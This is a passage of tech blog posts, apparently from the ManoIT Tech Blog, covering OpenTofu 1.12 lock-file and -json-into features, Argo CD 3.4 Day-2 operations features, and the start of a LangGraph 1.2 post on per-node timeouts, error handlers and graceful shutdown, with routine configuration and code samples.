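// Count h1:/zh: entries per provider block in dependency lock file text.
function summarizeLockHashes(lockFile: string): ProviderHashes[] {
  const summaries: ProviderHashes[] = [];
  // Assumes each provider block ends with a closing brace at column 0.
  const block = /provider\s+"([^"]+)"\s*\{([\s\S]*?)\n\}/g;
  let match: RegExpExecArray | null;
  while ((match = block.exec(lockFile)) !== null) {
    const body = match[2];
    summaries.push({
      provider: match[1],
      h1: (body.match(/"h1:/g) ?? []).length,
      zh: (body.match(/"zh:/g) ?? []).length,
    });
  }
  return summaries;
}

// Providers that a cache or mirror could not verify because no h1: hash is recorded.
function providersMissingH1(lockFile: string): string[] {
  return summarizeLockHashes(lockFile)
    .filter((summary) => summary.h1 === 0)
    .map((summary) => summary.provider);
}
```

A CI step could read .terraform.lock.hcl after tofu init and fail when providersMissingH1 returns anything.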

On top of this, concurrent provider installation was added. When many providers are needed, install requests are parallelized to cut tofu init time. The effect is most noticeable on monolithic root modules with 10+ providers.

Situation	Up to 1.11	1.12.0
Global cache / mirror verification	run `providers lock` manually after `init`	h1 & zh auto-filled in one `init`
Installing many providers	sequential requests	concurrent (parallel) -> faster init
Lock file hashes	mostly `zh:`, `h1:` computed locally	full formats prepopulated at install time

6. Simultaneous Output (-json-into) and Observable IaC

Many OpenTofu commands support both human-oriented UI output and machine-readable JSON, but until now you could only get one or the other. For tools building alternative UIs, this meant "you must reimplement the entire UI from JSON alone before it's usable." 1.12.0's -json-into=FILENAME option sends the same machine-readable output as -json to a separate file, while the standard output keeps showing the normal human-facing UI.

# Human UI in the terminal, machine JSON to a file, simultaneously
tofu apply -json-into=apply-events.json

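# To consume streaming events in real time, use a named pipe / special device
mkfifo /tmp/tofu-events
# Start a reader first (cat is a stand-in for your UI process): opening a FIFO
# for writing blocks until something has it open for reading
cat /tmp/tofu-events &
# Keep apply in the foreground so the interactive approval prompt still works
tofu apply -json-into=/tmp/tofu-events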

Stream the JSON into an IPC object like a named pipe or /dev/fd/N, and an external tool can responsively display progress concurrently with OpenTofu's execution. Combined with the local-only OpenTelemetry tracing introduced in 1.10, this opens the path to treating "IaC execution as an observable pipeline."
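
As a rough sketch of the consuming side, the reader below treats the stream as newline-delimited JSON and tallies events by type. It assumes each line is one JSON object with `type` and `@message` fields, as in the existing `-json` output; the sample lines are hypothetical, so check the field names against real output before building on them.

```python
import io
import json
from collections import Counter
from typing import IO, Iterator


def read_events(stream: IO[str]) -> Iterator[dict]:
    """Yield one dict per JSON line; skip blank or non-JSON lines."""
    for line in stream:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(event, dict):
            yield event


def summarize(stream: IO[str]) -> Counter:
    """Count events by their 'type' field (assumed field name)."""
    return Counter(event.get("type", "unknown") for event in read_events(stream))


# Hypothetical sample lines standing in for what arrives on the pipe.
SAMPLE_LINES = (
    '{"@level": "info", "@message": "Plan: 1 to add", "type": "change_summary"}\n'
    "not json\n"
    '{"@level": "info", "@message": "example.a: Creating...", "type": "apply_start"}\n'
    '{"@level": "info", "@message": "example.a: Creation complete", "type": "apply_complete"}\n'
)

print(summarize(io.StringIO(SAMPLE_LINES)))

# Against a named pipe the same generator applies, reading until the writer closes:
# with open("/tmp/tofu-events", encoding="utf-8") as pipe:
#     for event in read_events(pipe):
#         print(event.get("type"), event.get("@message"))
```

Skipping malformed lines rather than raising keeps a dashboard alive if a partial line arrives while the run is being interrupted.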

7. Deprecations — WinRM Provisioners and 32-bit

1.12 is an operations-hardening release with few breaking changes, but you must be aware of two deprecation notices.

Item	1.12 status	Action
WinRM provisioner connections	warning (deprecated), still functional	slated for removal in v1.13 -> migrate to OpenSSH for Windows
32-bit CPU (`386`, `arm`) official builds	no change in 1.12 (notice only)	warnings from v1.13 -> builds dropped later, move to 64-bit (amd64/arm64)

⚠️ Warning: if you have provisioners using connection { type = "winrm" }, "later" won't cut it. It's fully removed in v1.13, so use this upgrade as the trigger to plan an OpenSSH-for-Windows migration. 32-bit environments likewise need a 64-bit move reviewed within the next year.

8. Cumulative Changes: 1.10 -> 1.12

For teams jumping from 1.9 or below, here are the cumulative highlights.

Area	Introduced	Core
State encryption (external key providers)	1.10	AWS/GCP KMS, OpenBao, PBKDF2 key provider chaining
Native S3 state locking	1.10	S3 backend locking without DynamoDB
OCI registry distribution	1.10	distribute providers/modules to air-gapped environments
Ephemeral values / `enabled` meta-argument	1.11	in-memory-only data, conditional enable beyond count/for_each
Dynamic prevent_destroy / destroy=false	1.12	per-environment delete protection, state-only removal
Identity import / checksum automation	1.12	schema-based import, full hashes in one init

9. ManoIT Internal Adoption Checklist

#	Task	Owner	Done when
1	Bump staging root module to 1.12.0, review lock-file diff after first `init`	Platform	h1 & zh hashes auto-added confirmed
2	Parameterize `prevent_destroy` in shared DB/storage modules (default true)	Module owners	prod=protected, dev=off controlled by caller
3	Apply `destroy = false` to legacy resources to keep but unmanage	Domain owners	0 destroys in plan, remote object preserved
4	Re-organize composite-key resources (SSM targets, etc.) via identity import	Domain owners	deterministic import via import block + for_each
5	Remove the manual `tofu providers lock` step from CI	DevOps	init alone verifies cache/mirror
6	Stream apply events to the internal dashboard via `-json-into`	Observability	live execution progress displayed
7	Inventory WinRM provisioners -> OpenSSH migration roadmap	Infra	0 winrm uses before v1.13

10. Conclusion — "The Next IaC Challenge Isn't Creation, It's Lifecycle"

If I had to sum up OpenTofu 1.12.0 in one line: "creating resources is a solved problem; what remains is the lifecycle operations of protecting them differently per environment, detaching them safely, importing them accurately, and not fighting lock files." Dynamic prevent_destroy lets you control delete protection per environment from a single module. destroy = false keeps the intent of "unmanage but preserve" in code. Identity import ends the era of guessing IDs. Checksum automation strips the manual tofu providers lock out of CI. And -json-into elevates IaC execution into an observable pipeline.

Three closing recommendations. (1) Review the lock-file diff on the first init after upgrading — a bulk addition of h1 hashes is normal, and committing it makes cache/mirror friction disappear. (2) Parameterize prevent_destroy in shared modules — the change that cuts deletion accidents most for the least code. (3) If you use WinRM provisioners, inventory them now — the v1.13 removal is not "optional" but a "scheduled deadline." The shortest one-liner: "this sprint, bump staging to 1.12, turn the shared DB module's prevent_destroy into a variable, and run plans on both prod and dev once."

Originally published at ManoIT Tech Blog.

Argo CD 3.4 Deep Dive: Cluster Pause Reconciliation, Helm valueFiles Globs & Source Hydrator Commit Authorship

daniel jeong — Mon, 01 Jun 2026 22:32:04 +0000

Anyone who has moved GitOps from demo to production knows the hard part isn't deploying — it's everything after, the so-called Day-2 operations. An incident hits at midnight, but the Argo CD controller keeps stubbornly reconciling everything back to its "desired state." Your values files have multiplied into dozens per environment and you'd kill for a single glob. Hydration commits give no clue who authored them. And on dual-stack clusters, mysterious DNS timeouts quietly eat away at the controller.

Argo CD 3.4 (GA in May 2026, first stable tag v3.4.1) takes direct aim at exactly these operational pains. As the official v3.4.1 release notes put it, the focus of this cycle is Day-2: incident management, alert routing, and Helm template flexibility. This article breaks down the root cause behind five of 3.4's key features from an operations and architecture angle, then lays out how ManoIT rolled them into our internal multi-cluster GitOps.

1. Why 3.4 — Quarterly Cadence, Center of Gravity Shifts to Day-2

Some context first. Argo CD ships a minor release once per quarter (every 3 months), and only the three most recent minor versions get patches. If 3.2 was about UI and performance and 3.3 established the Source Hydrator (the rendered-manifests pattern that hydrates manifests into a separate branch), then 3.4 sits on top of that and asks: "in production, what do we pause, what do we track, and what do we route?" The feature freeze locked at v3.4.0-rc2, GA landed early May 2026, and patches followed quickly — v3.4.3 arrived on May 28, 2026.

Version	GA	Theme	Headline
3.2	H2 2025	UI / performance	UI overhaul, controller perf
3.3	Early 2026	Rendered manifests	Source Hydrator, PreDelete Hooks
3.4	2026-05	Day-2 operations	Cluster pause, Helm globs, hydrator commit author, AppSet Watch, gRPC DNS TXT off

3.4 is an operations-hardening release with few breaking changes, but three environment shifts must be checked before upgrading (see section 7). First, the new features.

2. Per-Cluster Pause Reconciliation — A New Standard for Incident Response

Until now, "pausing reconciliation" in Argo CD meant per-application (switching an Application's sync policy to manual, or applying a sync window). The problem: the unit of an incident is often an entire cluster. When a target cluster is unstable but the controller keeps pushing hundreds of its apps toward desired state, unintended rollbacks and redeploys pile on in the middle of an outage and make things worse.

3.4 introduces an annotation that pauses reconciliation for an entire cluster (PR #26442). Add the pause annotation to the cluster secret (or target resource) and the controller stops attempting reconciles against that cluster. It's exactly "hitting the brakes at the cluster level."

# Add the pause annotation to a cluster secret -> reconcile halts for that cluster
apiVersion: v1
kind: Secret
metadata:
  name: cluster-prod-apac
  namespace: argocd
  labels:
    argocd.argoproj.io/secret-type: cluster
  annotations:
    # WARNING: pausing only stops "automatic convergence to desired state."
    # Already-running workloads keep running, and drift can accumulate.
    argocd.argoproj.io/pause-reconciliation: "true"
type: Opaque
stringData:
  name: prod-apac
  server: https://k8s-prod-apac.internal:6443

Ops tip: read pause as "observation continues, only auto-convergence stops." Drift accumulates during the incident, so right after un-pausing, always inspect the diff first and sync only the intended changes.
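
For a runbook, it can help to generate the pause and resume patches instead of hand-editing the secret mid-incident. The sketch below builds a JSON merge patch for the annotation shown in the manifest above. The helper name is hypothetical, and the annotation key is copied from this article, so confirm it against the 3.4 docs before relying on it.

```python
import json

# Annotation key as shown in the manifest above (verify against the release docs).
PAUSE_ANNOTATION = "argocd.argoproj.io/pause-reconciliation"


def pause_patch(paused: bool) -> dict:
    """Build a JSON merge patch that sets or removes the pause annotation."""
    # In a JSON merge patch (RFC 7386), a null value deletes the key.
    value = "true" if paused else None
    return {"metadata": {"annotations": {PAUSE_ANNOTATION: value}}}


print(json.dumps(pause_patch(True)))
print(json.dumps(pause_patch(False)))
```

Either output can be passed to `kubectl patch secret cluster-prod-apac -n argocd --type merge -p '<json>'`. Removing the key on resume, rather than setting it to "false", leaves the secret identical to its pre-incident form.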

3. Helm valueFiles Wildcard Globs — Taming the values File Explosion

Run multi-env, multi-region deployments and your values files multiply with every environment and region combination: values-base.yaml, values-prod.yaml, values-prod-apac.yaml, values-feature-x.yaml… Previously you had to list each one in valueFiles, and every new file meant editing the Application manifest too.

3.4 supports wildcard glob patterns in valueFiles (PR #26768, cherry-picked to 3.4 as #26919). Get your directory convention right and you can pull in "every environment file under values/" with a single line.

apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: payments
  namespace: argocd
spec:
  source:
    repoURL: https://git.internal/manoit/payments-chart
    targetRevision: main
    path: chart
    helm:
      valueFiles:
        - values/base.yaml
        # 3.4: collect env values via glob (sort order = merge order)
        - "values/prod-*.yaml"
  destination:
    server: https://kubernetes.default.svc
    namespace: payments

WARNING: globs merge matched files in sorted order. Helm lets later values override earlier ones, so control merge precedence explicitly with filename prefixes (e.g. 10-, 20-). Most "why isn't my prod value taking effect?" questions turn out to be merge-order problems.
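
To make the precedence rule concrete, here is a small simulation, assuming matches are sorted lexically within each pattern and merged Helm-style (nested maps merge, later scalars win). The file names and values are hypothetical, and the sort rule Argo CD actually applies should be confirmed in its docs.

```python
from fnmatch import fnmatchcase


def expand_value_files(patterns: list, repo_files: list) -> list:
    """Expand each pattern in order; matches for one pattern are sorted lexically."""
    ordered = []
    for pattern in patterns:
        for name in sorted(f for f in repo_files if fnmatchcase(f, pattern)):
            if name not in ordered:
                ordered.append(name)
    return ordered


def deep_merge(base: dict, override: dict) -> dict:
    """Merge override into a copy of base; nested maps merge, other values replace."""
    merged = dict(base)
    for key, value in override.items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = deep_merge(merged[key], value)
        else:
            merged[key] = value
    return merged


# Hypothetical repository contents, already parsed from YAML.
FILES = {
    "values/base.yaml": {"replicas": 1, "resources": {"cpu": "100m", "memory": "128Mi"}},
    "values/prod-20-apac.yaml": {"replicas": 5},
    "values/prod-10-common.yaml": {"replicas": 3, "resources": {"cpu": "500m"}},
}

order = expand_value_files(["values/base.yaml", "values/prod-*.yaml"], list(FILES))
final = {}
for name in order:
    final = deep_merge(final, FILES[name])

print(order)
# ['values/base.yaml', 'values/prod-10-common.yaml', 'values/prod-20-apac.yaml']
print(final)
# {'replicas': 5, 'resources': {'cpu': '500m', 'memory': '128Mi'}}
```

The 20- file wins on `replicas` only because of its prefix. Rename it to sort before the 10- file and the final value becomes 3, which is why a snapshot test of the merged result is worth having.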

3.4 also added the ability to send custom User-Agent headers for Helm repository requests (PR #25473) — handy when an internal artifact proxy or OCI registry requires client identification.

4. Source Hydrator — Commit Authorship and UI Integration

The Source Hydrator that landed in 3.3 is a first-class implementation of the rendered-manifests pattern: it renders the source (dry source) kept in Git and commits it to a separate hydrated branch. Put it into production, though, and one thing grates immediately — every hydration commit has the same anonymous author, rendering audit logs and git blame meaningless.

3.4 makes the authorName/Email used for hydration commits configurable (PR #25746). It stamps an identity into the commit metadata — "this hydrate commit was made by which environment/bot" — restoring audit trails and accountability. After applying the setting, you can verify the identity is stamped correctly straight from the hydrated branch's commit log.

# Verify the hydrated branch's commit author is stamped with the bot identity
# (Source Hydrator renders the dry source and commits it to a separate hydrated branch)
git fetch origin environments/prod
git log origin/environments/prod --pretty='%h | %an <%ae> | %s' -n 5

# Expected output - before authorName/Email is set: anonymous/identical author
#   3f1a2b9 | argocd <argocd@noreply> | hydrate: payments @ a1b2c3d
# After: environment/bot identity is clearly distinguished
#   9c8d7e6 | argocd-hydrator-prod <gitops-bot+prod@manoit.co.kr> | hydrate: payments @ a1b2c3d
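
The same check can be automated. This sketch parses output in the `%h | %an <%ae> | %s` format used above and lists commits whose author email is not the expected bot identity. The function name is hypothetical, and the sample lines are the illustrative ones from this section, not real log output.

```python
import re

# One line of `git log --pretty='%h | %an <%ae> | %s'` output.
LINE_RE = re.compile(r"^(?P<sha>\S+) \| (?P<name>.*?) <(?P<email>[^>]*)> \| (?P<subject>.*)$")


def unexpected_authors(log_text: str, expected_email: str) -> list:
    """Return (sha, email) pairs for commits not authored by expected_email."""
    offenders = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line.strip())
        if match and match.group("email") != expected_email:
            offenders.append((match.group("sha"), match.group("email")))
    return offenders


SAMPLE_LOG = """\
9c8d7e6 | argocd-hydrator-prod <gitops-bot+prod@manoit.co.kr> | hydrate: payments @ a1b2c3d
3f1a2b9 | argocd <argocd@noreply> | hydrate: payments @ a1b2c3d
"""

print(unexpected_authors(SAMPLE_LOG, "gitops-bot+prod@manoit.co.kr"))
# [('3f1a2b9', 'argocd@noreply')]
```

Run against the hydrated branch after the setting is applied, an empty list for commits made since the change is a reasonable "done" signal.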

On top of that came UI integration — you can enable the hydrator from the app-create panel (#26485) and view hydrator properties directly in the Summary tab (#26152). On the stability side, GetDrySource() was fixed to preserve all source-type fields (cherry-pick #27189→#27196), and a batch of 3.3-era hydrator bugs (missing hydrated SHA on no-ops, missing creds) were cleaned up.

Area	3.4 change	Operational effect
Commit metadata	authorName/Email configurable (#25746)	Restores audit log / blame
UI	Hydrator toggle in create panel (#26485), Summary tab exposure (#26152)	Config visibility, fewer mistakes
Stability	GetDrySource field preservation, no-op SHA/creds fixes	Higher hydration reliability

5. ApplicationSet Operability — Health Field, Watch, listResourceEvents

The real unit of large-scale GitOps isn't a single Application — it's the ApplicationSet (AppSet). In a structure that stamps out tens to hundreds of apps at once via cluster/directory/Git generators, 3.4 elevates AppSet into a first-class, operable object.

Health field added to status (#25753) — read overall AppSet health directly from status, no need to manually aggregate hundreds of child apps.
ApplicationSet Watch API (#26409) and listResourceEvents API (#25537) — standard APIs to stream/query AppSet changes and events. External dashboards and automation attach via watch instead of polling.
Controller performance/correctness — the path that fetches cluster secrets was optimized, and AppSets in disallowed namespaces no longer trigger unnecessary reconciles on cluster-secret changes (#25622). A DuckType generator panic on non-string values was also fixed (cherry-pick #27265→#27526).

The UI gained an AppSet slide-out summary, a tree-view detail page, and a list page, completing the "operate AppSets visually" experience.

6. Notification & Networking — appProject Access and gRPC DNS TXT Opt-Out

Notifications are also core to Day-2. 3.4 lets notification templates access appProject information (#26470) — so you can put "which project's app failed to sync" directly into the alert body, sharpening routing accuracy. It also exposes the notifications controller's processors count as a command parameter (#26798) to tune throughput in high-volume alert environments.

The most operationally relevant networking change is disabling gRPC service-config DNS TXT lookups by default (#26077). It looks small but the root cause runs deep — in dual-stack (IPv4+IPv6) Kubernetes environments, gRPC clients excessively queried DNS TXT records looking for service config, causing timeouts and latency. 3.4 turns that lookup off by default, improving controller stability on dual-stack clusters.

If you've experienced "Argo CD intermittently slowing down" on a dual-stack cluster, the 3.4 upgrade alone may make the symptom disappear. This change is a default, so no extra configuration is required.

7. Upgrade Watch-Outs — Helm 3.19 K8s Version Interpretation, Dex 2.45, MS Teams O365 Connectors

3.4 is an operations-hardening release with a light migration burden, but check these three before upgrading.

Item	Change	Action
Helm 3.19.0	How Helm interprets the K8s cluster version changed → Argo CD aligns to it	Regression-test charts that depend on `.Capabilities.KubeVersion` rendering
Dex 2.45.0	Bundled Dex version upgrade (SSO)	Validate Dex connector config / OIDC flow in staging
MS Teams notifications	Microsoft deprecates and removes legacy Office 365 Connectors	Migrate Teams webhook delivery to the new mechanism

WARNING: if you were sending Teams notifications via O365 Connector webhooks, this is not "optional" but "required." Microsoft's deprecation breaks the existing path, so alert delivery itself may stop independent of the 3.4 upgrade.

8. ManoIT Internal Adoption Checklist

#	Task	Owner	Done criteria
1	Upgrade to 3.4.x in staging, reflect non-HA→HA manifest diffs	Platform	All apps Synced/Healthy post-upgrade
2	Helm 3.19 K8s version interpretation — regression-test KubeVersion-dependent charts	Chart owners	Render diff = 0 (excl. intended changes)
3	Add cluster pause annotation to the incident runbook	SRE	Pause/resume/diff procedure validated in a mock incident
4	Reorganize per-env values into glob rules (prefix ordering)	Domain owners	Deterministic merge order (snapshot test)
5	Assign per-env bot identity for Source Hydrator commit author (authorName/Email)	Platform	Identity visible in hydrated-branch blame
6	Move external dashboards from polling to AppSet Health field + Watch API	Observability	Lower dashboard latency, fewer API calls
7	Add appProject context to notification templates, migrate MS Teams path	SRE	Per-project routing + Teams delivery working
8	Measure gRPC DNS TXT-off effect (latency p99) on dual-stack clusters	Network	Controller reconcile latency stabilized

9. Conclusion — "The Next GitOps Challenge Isn't Deployment, It's Operations"

In one line, Argo CD 3.4 is a declaration that deployment automation is already a solved problem, and what remains is the Day-2 work of safely pausing, tracking, and routing that automation in the middle of an incident. Per-cluster pause aligns the unit of incident response with reality (the cluster); Helm valueFiles globs collapse the environment explosion into one line; the Source Hydrator's commit authorship returns audit trails to the rendered-manifests pattern. ApplicationSet's Health/Watch/listResourceEvents elevate the real unit of large-scale GitOps to a first-class object, and the gRPC DNS TXT default opt-out quietly removes invisible latency on dual-stack environments.

Three closing recommendations. (1) Before upgrading, check the Helm 3.19 impact and the MS Teams O365 Connector deprecation first — neither tolerates "later." (2) Put cluster pause into your runbook first — it's the change that raises incident-response capability the most for the least code. (3) If you use the Source Hydrator, set the commit author first — auto-commits without an audit trail are a powder keg for operational incidents. The shortest one-line recommendation: "This sprint, bump staging to 3.4 and run the cluster-pause → diff → selective-sync procedure once in a mock incident."

Originally published at ManoIT Tech Blog.

LangGraph 1.2 Deep Dive — Per-Node Timeouts, Error Handlers, Graceful Shutdown, DeltaChannel & Streaming v3

daniel jeong — Mon, 01 Jun 2026 01:58:10 +0000

When you move an AI agent from demo to production, the first thing to break is almost always the long-running path. An LLM call hangs at 30 seconds, an external tool stalls forever, or a rolling deploy SIGKILLs an in-flight agent — and that single failure wipes out tens of minutes of accumulated state. LangGraph 1.2.0 (released May 12, 2026) takes direct aim at exactly this. The official changelog summarizes it as "finer-grained control over node execution (timeouts, error recovery, and graceful shutdown), a new channel type that cuts checkpoint overhead for long-running threads, and a content-block-centric streaming API (v3)." The underlying idea is consistent: treat an agent run as a durable graph execution, not a Python function call. This post breaks down the five new capabilities from an operations and architecture angle, and lays out how ManoIT rolled them into its internal agent pipeline.

1. Why 1.2 — 1.0's durability, 1.1's type safety, 1.2's node control

Context first. LangGraph 1.0 went GA in October 2025 with a promise of no breaking changes until 2.0, establishing durable state, checkpointer-based resumption, and first-class human-in-the-loop. 1.1 (2026-03-10) added type-safe streaming/invoke and Pydantic/dataclass coercion behind an opt-in version="v2". And 1.2 pushes fault-tolerance controls that previously existed only at the whole-graph level down to the individual node level.

Version	Released	Theme	Key API
1.0.0	2025-10-20	Durable execution GA (persistence, resume, HITL)	`checkpointer`, `interrupt`
1.1.0	2026-03-10	Type-safe streaming/invoke	`version="v2"`, `GraphOutput`
1.2.0	2026-05-12	Node-level fault tolerance + streaming v3	`timeout=`, `error_handler=`, `DeltaChannel`, `version="v3"`

One caveat up front: the new timeouts and error handlers are Python-only, and timeouts work on async nodes only. Retry policies, however, continue to work in both Python and TypeScript.

2. Per-node timeouts — the decisive difference between run_timeout and idle_timeout

Previously there was no standard way to stop a single node from hanging forever. 1.2 adds add_node(..., timeout=) to cap how long a single attempt may run. The key is that it separates two kinds of limits:

run_timeout — a hard wall-clock limit. "This attempt must finish within N seconds," regardless of progress.
idle_timeout — an idle limit that resets on progress. It keeps a streaming LLM call (whose tokens keep flowing) alive while catching only a genuine stall.

You can supply both via TimeoutPolicy. When a limit fires, LangGraph raises NodeTimeoutError, clears the writes from that attempt, and hands off to the retry policy — so a timeout never leaves partial state behind.

from langgraph.graph import StateGraph
from langgraph.types import TimeoutPolicy, RetryPolicy

# NOTE: timeouts are async-node-only + Python-only
async def call_model(state: AgentState) -> dict:
    # Streaming LLM call — idle_timeout resets while tokens flow
    return {"messages": [await llm.ainvoke(state["messages"])]}

builder = StateGraph(AgentState)
builder.add_node(
    "call_model",
    call_model,
    # Hard 90s cap, but abort if 15s pass with no progress
    timeout=TimeoutPolicy(run_timeout=90.0, idle_timeout=15.0),
    retry_policy=RetryPolicy(max_attempts=3),  # timeout -> handed to retry
)

Operational guidance: put a run_timeout on external API/tool nodes to eliminate infinite waits, and use idle_timeout on streaming LLM nodes to catch stalls without killing legitimately long responses. Supplying both is the safest default.
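
The difference between the two limits is easiest to see outside the framework. The sketch below uses plain asyncio, not LangGraph's implementation. The exception classes, `consume`, `producer`, and `demo` are all hypothetical names, and a queue with a `None` sentinel stands in for a token stream.

```python
import asyncio


class RunTimeout(Exception):
    """The attempt exceeded its total wall-clock budget."""


class IdleTimeout(Exception):
    """No chunk arrived within the idle window."""


async def consume(queue: asyncio.Queue, run_timeout: float, idle_timeout: float) -> list:
    """Collect chunks until a None sentinel, enforcing both limits."""
    loop = asyncio.get_running_loop()
    deadline = loop.time() + run_timeout  # fixed once, never reset
    received = []
    while True:
        remaining = deadline - loop.time()
        if remaining <= 0:
            raise RunTimeout
        # The idle window restarts on every pass, i.e. after each chunk.
        run_limit_is_closer = remaining <= idle_timeout
        try:
            chunk = await asyncio.wait_for(queue.get(), timeout=min(idle_timeout, remaining))
        except asyncio.TimeoutError:
            raise (RunTimeout if run_limit_is_closer else IdleTimeout) from None
        if chunk is None:
            return received
        received.append(chunk)


async def producer(queue: asyncio.Queue, delays: list) -> None:
    """Emit one chunk after each delay, then the end-of-stream sentinel."""
    for index, delay in enumerate(delays):
        await asyncio.sleep(delay)
        await queue.put(f"chunk-{index}")
    await queue.put(None)


async def demo(delays: list, run_timeout: float, idle_timeout: float) -> str:
    queue = asyncio.Queue()
    task = asyncio.create_task(producer(queue, delays))
    try:
        chunks = await consume(queue, run_timeout, idle_timeout)
        return f"ok:{len(chunks)}"
    except (RunTimeout, IdleTimeout) as exc:
        return type(exc).__name__
    finally:
        task.cancel()


print(asyncio.run(demo([0.05] * 6, 1.0, 0.2)))    # steady stream -> ok:6
print(asyncio.run(demo([0.05, 0.5], 1.0, 0.2)))   # stall after first chunk -> IdleTimeout
print(asyncio.run(demo([0.1] * 10, 0.35, 0.2)))   # steady but too long -> RunTimeout
```

The third case is the one a single timeout cannot express: progress never stalls, yet the attempt is still cut off once the total budget is spent.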

3. Node-level error handlers — first-class Saga / compensation

When a node still fails after retries are exhausted, the whole graph used to blow up with an exception. 1.2 adds add_node(..., error_handler=) — a recovery function that runs after all retries are exhausted. The handler receives a typed NodeError and can return a Command to update state and route to a different node. This expresses Saga / compensating transactions — the "if one of several steps fails, roll back the earlier ones" pattern — declaratively inside the graph.

from langgraph.types import Command, RetryPolicy
from langgraph.errors import NodeError

def on_payment_failed(state: OrderState, error: NodeError) -> Command:
    # All retries failed -> compensate: release the reservation, route to rollback
    return Command(
        update={"status": "payment_failed", "error": str(error)},
        goto="release_inventory",   # compensation node that rolls back the prior step
    )

builder.add_node(
    "charge_payment",
    charge_payment,
    retry_policy=RetryPolicy(max_attempts=3),
    error_handler=on_payment_failed,  # called only after 3 failed attempts
)

The point is that you stop scattering exceptions across try/except blocks. The post-failure compensation flow becomes part of the graph topology, so failure paths show up in visualization, replay, and checkpoint analysis.
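
The control flow described here, retry first and compensate only once retries are exhausted, can be sketched in plain Python. This is an illustration of the ordering, not LangGraph's executor. `run_with_handler` and its `(state, next_node)` return shape are hypothetical stand-ins for a node plus a `Command`.

```python
from typing import Callable, Optional

State = dict


def run_with_handler(
    node: Callable,
    error_handler: Callable,
    state: State,
    success_goto: str,
    max_attempts: int = 3,
) -> tuple:
    """Retry node up to max_attempts; call error_handler only if every attempt fails."""
    last_error: Optional[Exception] = None
    for _ in range(max_attempts):
        try:
            return node(state), success_goto
        except Exception as exc:  # broad on purpose: any failure counts as an attempt
            last_error = exc
    return error_handler(state, last_error)


calls = {"charge": 0}


def charge_payment(state: State) -> State:
    """Hypothetical node that always fails, to exercise the failure path."""
    calls["charge"] += 1
    raise ConnectionError("gateway unreachable")


def on_payment_failed(state: State, error: Exception) -> tuple:
    """Compensation: record the failure and route to the rollback node."""
    return {**state, "status": "payment_failed", "error": str(error)}, "release_inventory"


final_state, goto = run_with_handler(
    charge_payment, on_payment_failed, {"order": 42}, success_goto="ship_order"
)
print(calls["charge"], goto, final_state["status"])
# 3 release_inventory payment_failed
```

The handler sees the last exception and the pre-failure state, which is all a compensation step usually needs to decide where to route next.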

4. Graceful shutdown — deploy without losing state

Killing an in-flight agent with SIGKILL during a rolling deploy or scale-down evaporates work in progress. 1.2's graceful shutdown stops the run cooperatively right after the current superstep completes and saves a resumable checkpoint. Create a RunControl and call request_drain() from any thread; the run raises GraphDrained and can be resumed later from exactly that point with the same config.

import logging
import signal

from langgraph.errors import GraphDrained  # assumed import path; confirm against the 1.2 docs
from langgraph.runtime import RunControl

log = logging.getLogger(__name__)
run_control = RunControl()

# e.g. in a SIGTERM handler: drain safely when the deploy signal arrives
def handle_sigterm(signum, frame):
    run_control.request_drain()  # callable from any thread

signal.signal(signal.SIGTERM, handle_sigterm)

async def run_or_drain(graph, inputs):
    config = {"configurable": {"thread_id": "order-42"}, "run_control": run_control}
    try:
        return await graph.ainvoke(inputs, config=config)
    except GraphDrained:
        # checkpoint already saved -> resume with the same config on the next pod
        log.info("drained; will resume from last checkpoint on next pod")
        return None

This breaks the "deploy = work loss" equation. A new pod resuming with the same thread_id picks up right after the superstep where the drain happened.
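
The mechanism behind this, stop only at a step boundary and persist progress first, can be sketched without the framework. The code below is a plain-Python illustration, not LangGraph's runtime. `Drained`, `run`, and the in-memory `checkpoint` dict are hypothetical, and a `threading.Event` plays the role of the drain request.

```python
import threading
from typing import Callable

State = dict
Step = Callable[[State], State]


class Drained(Exception):
    """Raised when a run stops early at a step boundary."""


def run(steps: list, checkpoint: dict, drain: threading.Event) -> State:
    """Run steps from the checkpointed position; stop at a boundary if drain is set."""
    state = checkpoint.get("state", {"done": []})
    index = checkpoint.get("next_step", 0)
    while index < len(steps):
        state = steps[index](state)
        index += 1
        # Persist progress after every completed step so a later run can resume.
        checkpoint["state"] = state
        checkpoint["next_step"] = index
        if drain.is_set() and index < len(steps):
            raise Drained(f"stopped before step {index}")
    return state


drain = threading.Event()


def reserve(state: State) -> State:
    return {"done": state["done"] + ["reserve"]}


def charge(state: State) -> State:
    drain.set()  # simulate a SIGTERM handler firing while this step runs
    return {"done": state["done"] + ["charge"]}


def ship(state: State) -> State:
    return {"done": state["done"] + ["ship"]}


steps = [reserve, charge, ship]
checkpoint = {}
try:
    run(steps, checkpoint, drain)
except Drained:
    print("drained; next step index:", checkpoint["next_step"])  # 2

drain.clear()  # the "next pod" starts with no pending drain request
result = run(steps, checkpoint, drain)
print(result)  # {'done': ['reserve', 'charge', 'ship']}
```

The step that was running when the drain arrived still completes and is checkpointed, so the resumed run neither repeats `charge` nor skips `ship`.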

5. DeltaChannel — cut long-thread checkpoint cost to increments

A normal channel re-serializes the full accumulated value on every step. For channels that grow over time — like a message list — checkpoint write cost balloons in proportion to thread length. DeltaChannel (beta) stores only the incremental delta per step to cut that overhead. Since pure deltas would make reads expensive to reconstruct, snapshot_frequency=K writes a full snapshot every K steps to keep read latency bounded.

from typing import Annotated, TypedDict
from langgraph.channels import DeltaChannel
from langgraph.graph.message import add_messages

class AgentState(TypedDict):
    # DeltaChannel on a long-growing message channel
    # full snapshot every 5 steps -> lower write cost, bounded read latency
    messages: Annotated[list, DeltaChannel(add_messages, snapshot_frequency=5)]

Aspect	Default channel	DeltaChannel (beta)
Per-step serialization	Re-serialize full value	Store delta only
Write cost	Grows with thread length	Converges to ~constant
Read latency	Low (full value on hand)	Bounded via `snapshot_frequency`
Best for	Small, rarely-changing channels	Long, large channels (message lists)
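
The write-versus-read trade-off in the table can be illustrated with a toy append-only log. This is a sketch of the general delta-plus-snapshot idea under simple assumptions (a list channel, one record per step), not DeltaChannel's actual storage format; the `DeltaLog` class is hypothetical.

```python
class DeltaLog:
    """Store per-step deltas, with a full snapshot every snapshot_frequency steps."""

    def __init__(self, snapshot_frequency: int) -> None:
        self.snapshot_frequency = snapshot_frequency
        self.records = []  # each entry is ("snapshot", full list) or ("delta", new items)
        self._value = []

    def append_step(self, new_items: list) -> None:
        """Record one step's new items, as a delta or a full snapshot."""
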